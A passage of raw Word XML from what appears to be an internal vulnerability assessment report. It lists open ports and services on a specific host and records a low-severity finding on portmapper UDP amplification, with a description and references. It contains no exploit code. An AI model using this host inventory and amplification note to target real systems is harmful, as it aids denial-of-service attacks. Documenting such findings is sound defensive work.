              <w:t>9.114.12.79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD09AEB"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66D3DF8B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="088E3A08"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01070C52"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06705B24"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111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F653425" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="3B151A75"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5354FD24"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7E80210F"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514</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14812FD7" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="05BF0E9D"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33A4BBB1"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51C15030"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1191</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002E27F2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>gpfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="60F98E1F"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0DA04A26"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59493CA0"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4739</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69A7AF36" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ipfix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="48810BD1"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60CE1D7E"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5E4E49A2"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9085</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6BA40A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ibm-rsyscon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="71369600" w14:textId="77777777" w:rsidTr="00132DA3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313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9AF3841" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>9.114.12.79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="720DDB98"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18AE4916" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="1727992A"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56256301"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7353F181"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111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7664E163" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="0C495F87" w14:textId="77777777" w:rsidTr="00132DA3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652BA005" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55A6CFC2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>42007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B7D2D8C" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="292AD6F6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194309">
        <w:bookmarkStart w:id="22" w:name="_Toc199711436"/>
        <w:bookmarkStart w:id="23" w:name="_Toc200562838"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194309: Portmapper UDP based amplification attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="6DC066"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Low)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>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5BF7BB1B" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B855848" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7598B5D8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Portmapper (also referred to as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>portmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> or RPC Portmapper) is a service, which always listens on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> 111, and is used to map other RPC services (such as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>nfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>nlockmgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>quotad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, etc.) to their corresponding port number on the server. When a remote host makes an RPC call to that server, it first consults with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>portmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> to determine where the RPC server is listening. Querying portmapper is a small request which generates a large response, which makes it a good candidate for DDoS attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E850AB0" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50F7FF71" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00B90620" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B90620">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550F757B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://ddos-guard.net/en/terms/attacks/port-111-rpcbind-vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1ACAF2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://www.securityweek.com/rpc-portmapper-abused-ddos-attack-reflection-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>amplification/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E888E6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4ED89102" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Below are the related screenshots:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653FCF11" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="188D28F7" wp14:editId="19387D2D">
                  <wp:extent cx="5930900" cy="2600077"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5" name="Drawing 5" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 5" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5933930" cy="2601405"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E16EFB" wp14:editId="306B5A24">
                  <wp:extent cx="5930900" cy="893851"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6" name="Drawing 6" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 6" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5948896" cy="896563"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
